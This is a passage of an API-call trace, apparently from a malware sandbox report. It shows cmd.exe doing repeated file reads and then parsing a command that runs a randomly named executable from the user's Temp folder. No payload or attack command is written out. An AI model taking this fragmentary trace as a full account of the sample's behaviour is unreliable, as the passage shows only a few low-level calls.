lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.943] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.944] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.945] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.946] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.947] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.948] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.949] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.949] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.949] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.949] ReadFile (in: hFile=0x54, lpBuffer=0x1ceb7c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdd6c, lpOverlapped=0x0 | out: lpBuffer=0x1ceb7c*, lpNumberOfBytesRead=0x1cdd6c*=0x200, lpOverlapped=0x0) returned 1 [0111.965] _close (_FileHandle=4) returned 0 [0111.965] FindNextFileW (in: hFindFile=0x3b21d0, lpFindFileData=0x1cede0 | out: lpFindFileData=0x1cede0) returned 0 [0111.965] GetLastError () returned 0x12 [0111.965] FindClose (in: hFindFile=0x3b21d0 | out: hFindFile=0x3b21d0) returned 1 [0111.965] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0111.968] _close (_FileHandle=3) returned 0 [0111.968] GetConsoleTitleW (in: lpConsoleTitle=0x1cf27c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.968] GetFileAttributesW (lpFileName="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"" (normalized: "c:\\users\\eebsym5\\desktop\\\"c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe\"")) returned 0xffffffff [0111.968] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0111.968] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0111.968] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0111.968] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0111.968] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0111.968] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0111.968] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0111.968] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0111.968] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0111.968] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0111.968] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0111.968] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0111.968] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0111.968] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0111.968] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0111.968] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0111.968] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0111.968] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0111.968] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0111.968] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0111.968] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0111.968] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0111.968] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0111.968] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0111.968] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0111.969] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0111.969] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0111.969] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0111.969] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0111.969] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0111.969] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0111.969] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0111.969] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0111.969] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0111.969] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0111.969] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0111.969] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0111.969] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0111.969] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0111.969] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0111.969] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0111.969] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0111.969] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0111.969] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0111.969] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0111.969] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0111.969] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0111.969] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0111.969] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0111.969] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0111.969] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0111.969] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0111.969] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0111.969] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0111.969] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0111.969] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0111.969] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0111.969] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0111.969] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0111.969] _wcsicmp (_String1="\"C", _String2="RD") 